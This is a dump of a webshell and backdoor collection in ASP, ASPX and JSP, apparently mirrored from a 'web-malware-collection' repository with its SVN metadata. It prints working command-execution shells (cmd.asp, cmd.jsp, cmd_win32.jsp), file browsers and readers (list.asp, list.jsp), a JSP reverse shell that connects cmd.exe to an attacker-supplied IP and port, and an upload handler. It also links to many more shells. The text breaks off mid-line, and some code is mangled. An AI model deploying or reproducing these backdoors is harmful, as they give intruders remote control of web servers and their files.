79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/fileupload.aspx.svn-base: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.IO" %> 3 | 4 | 5 | 6 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/list.asp.svn-base: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 |
29 | 30 | 31 | 32 |
33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("

PATH: " & file & "

") 39 | ListFolder(file) 40 | End If 41 | 42 | If tipo="2" then 43 | Response.Write("

FILE: " & file & "

") 44 | 45 | Set oStr = server.CreateObject("Scripting.FileSystemObject") 46 | Set oFich = oStr.OpenTextFile(file, 1) 47 | 48 | Response.Write("
--
") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
--
") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
( ) " & ".." & "" & vbCrLf) 65 | 66 | for each item in folder.SubFolders 67 | Response.Write("
( ) " & item.Name & "" & vbCrLf) 68 | next 69 | 70 | for each item in folder.Files 71 | Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
  • " & vbCrLf) 72 | next 73 | 74 | end sub 75 | 76 | %> 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/ntdaddy.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/ntdaddy.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/sql.aspx.svn-base: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Data"%> 3 | <%@ Import namespace="System.Data.SqlClient"%> 4 | 5 | 6 | 7 | 71 | 72 | 73 | 74 | SQL 75 | 76 | 77 | 78 |
    79 |
    80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 89 | 90 |
    88 |
    91 |
    92 |
    93 | 94 | 95 | -------------------------------------------------------------------------------- /ASP/.svn/text-base/tool.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/tool.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/toolaspshell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/toolaspshell.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/zehir.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/zehir.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/zehir.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/zehir.txt.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/zehir4.asp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/zehir4.asp.svn-base -------------------------------------------------------------------------------- /ASP/.svn/text-base/zehir4.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/.svn/text-base/zehir4.txt.svn-base -------------------------------------------------------------------------------- /ASP/3fexe.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/3fexe.asp -------------------------------------------------------------------------------- /ASP/3fexe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/3fexe.txt -------------------------------------------------------------------------------- /ASP/EFSO.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/EFSO.txt -------------------------------------------------------------------------------- /ASP/ELMALISEKER Backd00r.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/ELMALISEKER Backd00r.asp -------------------------------------------------------------------------------- /ASP/NTDaddy.v1.9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/NTDaddy.v1.9.txt -------------------------------------------------------------------------------- /ASP/RHTools.v1.5-BETA.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/RHTools.v1.5-BETA.txt -------------------------------------------------------------------------------- /ASP/RemExp.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/RemExp.asp -------------------------------------------------------------------------------- /ASP/Server Variables.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Dim Vars 3 | %> 4 | 5 |

     

    6 |

     

    7 |

    A list of all server 8 | variables :

    9 |


    10 |
    11 |

    12 | 13 | 14 | 17 | 20 | 21 | <% For Each Vars In Request.ServerVariables %> 22 | 23 | 24 | 25 | 26 | <% Next %> 27 |

    Server 15 | Variable Name

    16 |

    Server 18 | Variable Value

    19 |
    <%= Vars %><%= Request.ServerVariables(Vars) %> 
    28 | -------------------------------------------------------------------------------- /ASP/cmd-asp-5.1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | 3 | ' ASP Cmd Shell On IIS 5.1 4 | ' brett.moore_at_security-assessment.com 5 | ' http://seclists.org/bugtraq/2006/Dec/0226.html 6 | 7 | 8 | Dim oS,oSNet,oFSys, oF,szCMD, szTF 9 | On Error Resume Next 10 | Set oS = Server.CreateObject("WSCRIPT.SHELL") 11 | Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") 12 | Set oFSys = Server.CreateObject("Scripting.FileSystemObject") 13 | szCMD = Request.Form("C") 14 | If (szCMD <> "") Then 15 | szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() 16 | ' Here we do the command 17 | Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & 18 | """",0,True) 19 | response.write szTF 20 | ' Change perms 21 | Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G 22 | everyone:F",0,True) 23 | Set oF = oFSys.OpenTextFile(szTF,1,False,0) 24 | End If 25 | %> 26 |
    " method="POST"> 27 | 28 |
    29 | Machine: <%=oSNet.ComputerName%>
    30 | Username: <%=oSNet.UserName%>
    31 | <% 32 | If (IsObject(oF)) Then 33 | On Error Resume Next 34 | Response.Write Server.HTMLEncode(oF.ReadAll) 35 | oF.Close 36 | Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) 37 | End If 38 | 39 | %> 40 | 41 | 42 | -------------------------------------------------------------------------------- /ASP/cmd.asp: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo 6 | ' Release: 2000-12-01 7 | ' OS: Windows 2000, 4.0 NT 8 | ' ------------------------------------------- 9 | 10 | Dim oScript 11 | Dim oScriptNet 12 | Dim oFileSys, oFile 13 | Dim szCMD, szTempFile 14 | 15 | On Error Resume Next 16 | 17 | ' -- create the COM objects that we will be using -- ' 18 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 19 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 20 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 21 | 22 | ' -- check for a command that we have posted -- ' 23 | szCMD = Request.Form(".CMD") 24 | If (szCMD <> "") Then 25 | 26 | ' -- Use a poor man's pipe ... a temp file -- ' 27 | szTempFile = "C:\" & oFileSys.GetTempName( ) 28 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 29 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 30 | 31 | End If 32 | 33 | %> 34 | 35 | 36 |
    " method="POST"> 37 | 38 | 39 |
    40 |
    41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
    42 | 
    43 | <% 44 | If (IsObject(oFile)) Then 45 | ' -- Read the output from our command and remove the temp file -- ' 46 | On Error Resume Next 47 | Response.Write Server.HTMLEncode(oFile.ReadAll) 48 | oFile.Close 49 | Call oFileSys.DeleteFile(szTempFile, True) 50 | End If 51 | %> 52 | 53 | 54 | -------------------------------------------------------------------------------- /ASP/cmd.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" Debug="true" %> 2 | <%@ import Namespace="system.IO" %> 3 | <%@ import Namespace="System.Diagnostics" %> 4 | 5 | 25 | 26 | 27 | 28 |
    29 |

    Program 30 | c:\windows\system32\cmd.exe 31 |

    Arguments 32 | /c net user 33 |

    34 |

    35 |

    36 | 37 | -------------------------------------------------------------------------------- /ASP/cmdexec.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Diagnostics"%> 3 | <%@ Import Namespace="System.IO" %> 4 | 5 | 6 | 7 | 63 | 64 | 65 | 66 | Command 67 | 68 | 69 |
    70 |
    71 | 72 | 73 | 74 | 75 | 76 |
    77 |
    78 |
    79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /ASP/fileupload.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.IO" %> 3 | 4 | 5 | 6 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /ASP/list.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 |
    29 | 30 | 31 | 32 |
    33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("

    PATH: " & file & "

    ") 39 | ListFolder(file) 40 | End If 41 | 42 | If tipo="2" then 43 | Response.Write("

    FILE: " & file & "

    ") 44 | 45 | Set oStr = server.CreateObject("Scripting.FileSystemObject") 46 | Set oFich = oStr.OpenTextFile(file, 1) 47 | 48 | Response.Write("
    --
    ") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
    --
    ") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
    ( ) " & ".." & "" & vbCrLf) 65 | 66 | for each item in folder.SubFolders 67 | Response.Write("
    ( ) " & item.Name & "" & vbCrLf) 68 | next 69 | 70 | for each item in folder.Files 71 | Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
  • " & vbCrLf) 72 | next 73 | 74 | end sub 75 | 76 | %> 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /ASP/ntdaddy.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/ntdaddy.asp -------------------------------------------------------------------------------- /ASP/sql.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import namespace="System.Data"%> 3 | <%@ Import namespace="System.Data.SqlClient"%> 4 | 5 | 6 | 7 | 71 | 72 | 73 | 74 | SQL 75 | 76 | 77 | 78 |
    79 |
    80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 89 | 90 |
    88 |
    91 |
    92 |
    93 | 94 | 95 | -------------------------------------------------------------------------------- /ASP/tool.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/tool.asp -------------------------------------------------------------------------------- /ASP/toolaspshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/toolaspshell.txt -------------------------------------------------------------------------------- /ASP/zehir.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/zehir.asp -------------------------------------------------------------------------------- /ASP/zehir.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/zehir.txt -------------------------------------------------------------------------------- /ASP/zehir4.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/zehir4.asp -------------------------------------------------------------------------------- /ASP/zehir4.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/ASP/zehir4.txt -------------------------------------------------------------------------------- /JSP/.svn/all-wcprops: -------------------------------------------------------------------------------- 1 | K 25 2 | svn:wc:ra_dav:version-url 3 | V 35 4 | /svn/!svn/ver/6/trunk/Backdoors/JSP 5 | END 6 | jspShell.jsp 7 | K 25 8 | svn:wc:ra_dav:version-url 9 | V 48 10 | /svn/!svn/ver/3/trunk/Backdoors/JSP/jspShell.jsp 11 | END 12 | up.jsp 13 | K 25 14 | svn:wc:ra_dav:version-url 15 | V 42 16 | /svn/!svn/ver/3/trunk/Backdoors/JSP/up.jsp 17 | END 18 | cmd_win32.jsp 19 | K 25 20 | svn:wc:ra_dav:version-url 21 | V 49 22 | /svn/!svn/ver/3/trunk/Backdoors/JSP/cmd_win32.jsp 23 | END 24 | up_win32.jsp 25 | K 25 26 | svn:wc:ra_dav:version-url 27 | V 48 28 | /svn/!svn/ver/3/trunk/Backdoors/JSP/up_win32.jsp 29 | END 30 | list.jsp 31 | K 25 32 | svn:wc:ra_dav:version-url 33 | V 44 34 | /svn/!svn/ver/3/trunk/Backdoors/JSP/list.jsp 35 | END 36 | jspbd.jsp 37 | K 25 38 | svn:wc:ra_dav:version-url 39 | V 45 40 | /svn/!svn/ver/3/trunk/Backdoors/JSP/jspbd.jsp 41 | END 42 | browser.jsp 43 | K 25 44 | svn:wc:ra_dav:version-url 45 | V 47 46 | /svn/!svn/ver/3/trunk/Backdoors/JSP/browser.jsp 47 | END 48 | cmd.jsp 49 | K 25 50 | svn:wc:ra_dav:version-url 51 | V 43 52 | /svn/!svn/ver/3/trunk/Backdoors/JSP/cmd.jsp 53 | END 54 | JspWebshell 1.2.jsp 55 | K 25 56 | svn:wc:ra_dav:version-url 57 | V 57 58 | /svn/!svn/ver/6/trunk/Backdoors/JSP/JspWebshell%201.2.jsp 59 | END 60 | -------------------------------------------------------------------------------- /JSP/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 19 5 | https://web-malware-collection.googlecode.com/svn/trunk/Backdoors/JSP 6 | https://web-malware-collection.googlecode.com/svn 7 | 8 | 9 | 10 | 2012-02-08T09:23:47.111275Z 11 | 6 12 | the.infodox@gmail.com 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 0305ef65-cdf5-4f86-fc4c-e3b0785f7043 28 | 29 | jspShell.jsp 30 | file 31 | 32 | 33 | 34 | 35 | 2012-06-13T20:36:45.097986Z 36 | 0d5b5a17552254be6c1c8f1eb3a5fdc1 37 | 2012-02-01T17:03:16.160727Z 38 | 3 39 | the.infodox@gmail.com 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 13250 62 | 63 | up.jsp 64 | file 65 | 66 | 67 | 68 | 69 | 2012-06-13T20:36:45.097986Z 70 | ae4fd9816eadffeb84545a9c1c960cf4 71 | 2012-02-01T17:03:16.160727Z 72 | 3 73 | the.infodox@gmail.com 74 | has-props 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 3735 96 | 97 | cmd_win32.jsp 98 | file 99 | 100 | 101 | 102 | 103 | 2012-06-13T20:36:45.097986Z 104 | 91552a04c65961ed0e6cae1ed67a2a7b 105 | 2012-02-01T17:03:16.160727Z 106 | 3 107 | the.infodox@gmail.com 108 | has-props 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 853 130 | 131 | up_win32.jsp 132 | file 133 | 134 | 135 | 136 | 137 | 2012-06-13T20:36:45.101986Z 138 | e116d636a9b7b9423a04c75f08443745 139 | 2012-02-01T17:03:16.160727Z 140 | 3 141 | the.infodox@gmail.com 142 | has-props 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 3735 164 | 165 | list.jsp 166 | file 167 | 168 | 169 | 170 | 171 | 2012-06-13T20:36:45.101986Z 172 | 1ea290ff4259dcaeb680cec992738eda 173 | 2012-02-01T17:03:16.160727Z 174 | 3 175 | the.infodox@gmail.com 176 | has-props 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 1870 198 | 199 | jspbd.jsp 200 | file 201 | 202 | 203 | 204 | 205 | 2012-06-13T20:36:45.101986Z 206 | 7d5e9732766cf5b8edca9b7ae2b6028f 207 | 2012-02-01T17:03:16.160727Z 208 | 3 209 | the.infodox@gmail.com 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 2359 232 | 233 | browser.jsp 234 | file 235 | 236 | 237 | 238 | 239 | 2012-06-13T20:36:45.105986Z 240 | de3c72c546c98287b0b10a6303ad6471 241 | 2012-02-01T17:03:16.160727Z 242 | 3 243 | the.infodox@gmail.com 244 | has-props 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 69911 266 | 267 | cmd.jsp 268 | file 269 | 270 | 271 | 272 | 273 | 2012-06-13T20:36:45.105986Z 274 | dec392cf6e7e22343f95f1a410267144 275 | 2012-02-01T17:03:16.160727Z 276 | 3 277 | the.infodox@gmail.com 278 | has-props 279 | 280 | 281 | 282 | 283 | 284 | 285 | 286 | 287 | 288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 | 298 | 299 | 864 300 | 301 | JspWebshell 1.2.jsp 302 | file 303 | 304 | 305 | 306 | 307 | 2012-06-13T20:36:45.105986Z 308 | 3f9acbd76c536c0838744845f9cf50ec 309 | 2012-02-08T09:23:47.111275Z 310 | 6 311 | the.infodox@gmail.com 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 26862 334 | 335 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/browser.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/cmd.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/cmd_win32.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/list.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/up.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/prop-base/up_win32.jsp.svn-base: -------------------------------------------------------------------------------- 1 | K 14 2 | svn:executable 3 | V 1 4 | * 5 | END 6 | -------------------------------------------------------------------------------- /JSP/.svn/text-base/JspWebshell 1.2.jsp.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/JSP/.svn/text-base/JspWebshell 1.2.jsp.svn-base -------------------------------------------------------------------------------- /JSP/.svn/text-base/cmd.jsp.svn-base: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (unix) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "
    "); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 |
    33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /JSP/.svn/text-base/cmd_win32.jsp.svn-base: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (win32) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "\n
    "); 21 | Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); disr = dis.readLine(); } 28 | } 29 | %> 30 |
    31 | -------------------------------------------------------------------------------- /JSP/.svn/text-base/jspbd.jsp.svn-base: -------------------------------------------------------------------------------- 1 | // backdoor.jsp 2 | < %@ 3 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 4 | % > 5 | < %! 6 | static class StreamConnector extends Thread 7 | { 8 | InputStream is; 9 | OutputStream os; 10 | 11 | StreamConnector(InputStream is, OutputStream os) 12 | { 13 | this.is = is; 14 | this.os = os; 15 | } 16 | 17 | public void run() 18 | { 19 | BufferedReader isr = null; 20 | BufferedWriter osw = null; 21 | 22 | try 23 | { 24 | isr = new BufferedReader(new InputStreamReader(is)); 25 | osw = new BufferedWriter(new OutputStreamWriter(os)); 26 | 27 | char buffer[] = new char[8192]; 28 | int lenRead; 29 | 30 | while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) 31 | { 32 | osw.write(buffer, 0, lenRead); 33 | osw.flush(); 34 | } 35 | } 36 | catch (Exception ioe) 37 | 38 | try 39 | { 40 | if(isr != null) isr.close(); 41 | if(osw != null) osw.close(); 42 | } 43 | catch (Exception ioe) 44 | } 45 | } 46 | % > 47 | 48 |

    JSP Backdoor Reverse Shell

    49 | 50 |
    51 | IP Address 52 | 53 | Port 54 | 55 | 56 |
    57 |

    58 |


    59 | 60 | < % 61 | String ipAddress = request.getParameter("ipaddress"); 62 | String ipPort = request.getParameter("port"); 63 | 64 | if(ipAddress != null && ipPort != null) 65 | { 66 | Socket sock = null; 67 | try 68 | { 69 | sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); 70 | 71 | Runtime rt = Runtime.getRuntime(); 72 | Process proc = rt.exec("cmd.exe"); 73 | 74 | StreamConnector outputConnector = 75 | new StreamConnector(proc.getInputStream(), 76 | sock.getOutputStream()); 77 | 78 | StreamConnector inputConnector = 79 | new StreamConnector(sock.getInputStream(), 80 | proc.getOutputStream()); 81 | 82 | outputConnector.start(); 83 | inputConnector.start(); 84 | } 85 | catch(Exception e) 86 | } 87 | % > 88 | -------------------------------------------------------------------------------- /JSP/.svn/text-base/list.jsp.svn-base: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // list.jsp = Directory & File View 7 | // 8 | // by: Sierra 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | <% 13 | if(request.getParameter("file")==null) { 14 | %> 15 | 16 |
    17 | 18 | 19 |
    20 | <% 21 | } 22 | %> 23 | <% //read the file name. 24 | try { 25 | File f = new File(request.getParameter("file")); 26 | if(f.isDirectory()) { 27 | int i; 28 | String fname = new String("Unknown"); 29 | String fcolor = new String("Black"); 30 | %> 31 | 32 | 33 | <% 34 | out.print("Path: " + f.toString() + "

    "); 35 | File flist[] = f.listFiles(); 36 | for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n"); 53 | } 54 | %> 55 |
    56 | <% 57 | 58 | } else { 59 | if(f.canRead() == true) { 60 | InputStream in = new FileInputStream(f); 61 | ServletOutputStream outs = response.getOutputStream(); 62 | int left = 0; 63 | try { 64 | while((left) >= 0 ) { 65 | left = in.read(); 66 | outs.write(left); 67 | } 68 | } catch(IOException ex) {ex.printStackTrace();} 69 | outs.flush(); 70 | outs.close(); 71 | in.close(); 72 | } else { 73 | out.print("Can't Read file
    "); 74 | } 75 | } 76 | } catch(Exception ex) {ex.printStackTrace();} 77 | %> -------------------------------------------------------------------------------- /JSP/.svn/text-base/up.jsp.svn-base: -------------------------------------------------------------------------------- 1 | 2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %> 3 | <% 4 | // 5 | // JSP_KIT 6 | // 7 | // up.jsp = File Upload (unix) 8 | // 9 | // by: Unknown 10 | // modified: 27/06/2003 11 | // 12 | %> 13 | 14 |
    15 | 16 | 17 |
    18 | 19 | <%! 20 | public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{ 21 | String boundary = null; 22 | Enumeration enum = request.getHeaderNames(); 23 | while(enum.hasMoreElements()){ 24 | String header = (String)enum.nextElement(); 25 | String hvalue = request.getHeader(header); 26 | prop.setProperty((header).toLowerCase(),hvalue); 27 | if("content-type".equalsIgnoreCase(header) ){ 28 | int idx = hvalue.lastIndexOf("boundary="); 29 | if(idx != -1 ){ 30 | boundary= hvalue.substring(idx+9 , hvalue.length()); 31 | } 32 | } 33 | } 34 | return boundary; 35 | 36 | } 37 | public String getFileName(String secondline){ 38 | int len = secondline.length(); 39 | int idx = secondline.lastIndexOf("filename="); 40 | if(idx == -1 ) return null; 41 | String filename = secondline.substring(idx+10 , len-1); 42 | filename = filename.replace('\\','/'); 43 | idx = filename.lastIndexOf("/"); 44 | idx = idx + 1; 45 | filename = filename.substring( idx ); 46 | return filename; 47 | } 48 | %> 49 | <% 50 | String DPATH = "/tmp/"; 51 | int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks 52 | int MAXSIZE = 10; // 10 Mega Byte 53 | String boundary = getBoundary(request,prop); 54 | if(boundary == null ){ 55 | boundary = prop.getProperty("boundary"); 56 | }else{ 57 | boundary = "--"+boundary; 58 | } 59 | if(boundary == null ){ 60 | return; 61 | } 62 | Long contentsize = new Long(prop.getProperty("content-length","0")); 63 | int c; 64 | StringWriter st = new StringWriter(); 65 | if(contentsize.longValue() < 1L ){ 66 | return; 67 | } 68 | long l = contentsize.longValue() - ROUGHSIZE; 69 | int KB = 1024; 70 | int MB = 1024 * KB; 71 | int csize = (int)(l / MB); 72 | if(csize > MAXSIZE ){ 73 | return; 74 | } 75 | ServletInputStream fin = request.getInputStream(); 76 | int cn; 77 | int count=0; 78 | while((c=fin.read()) != -1 ){ 79 | if( c == '\r') break; 80 | st.write(c); 81 | count++; 82 | } 83 | c=fin.read(); 84 | String tboundary = st.getBuffer().toString(); 85 | tboundary=tboundary.trim(); 86 | if(! tboundary.equalsIgnoreCase( boundary) ){ 87 | return; 88 | } 89 | st.close(); 90 | st = null; 91 | st = new StringWriter(); 92 | while((c=fin.read()) != -1 ){ 93 | if( c == '\r' ) break; 94 | st.write(c); 95 | } 96 | c=fin.read(); 97 | String secondline = st.getBuffer().toString(); 98 | String filename = getFileName(secondline); 99 | st.close(); 100 | st = null; 101 | st = new StringWriter(); 102 | while((c=fin.read()) != -1 ){ 103 | if( c == '\r' ) break; 104 | st.write( c ); 105 | } 106 | c=fin.read(); 107 | 108 | fin.read(); 109 | fin.read(); 110 | File newfile = null; 111 | FileOutputStream fout =null; 112 | try{ 113 | if(filename == null) throw new FileNotFoundException("File Name not found"); 114 | newfile = new 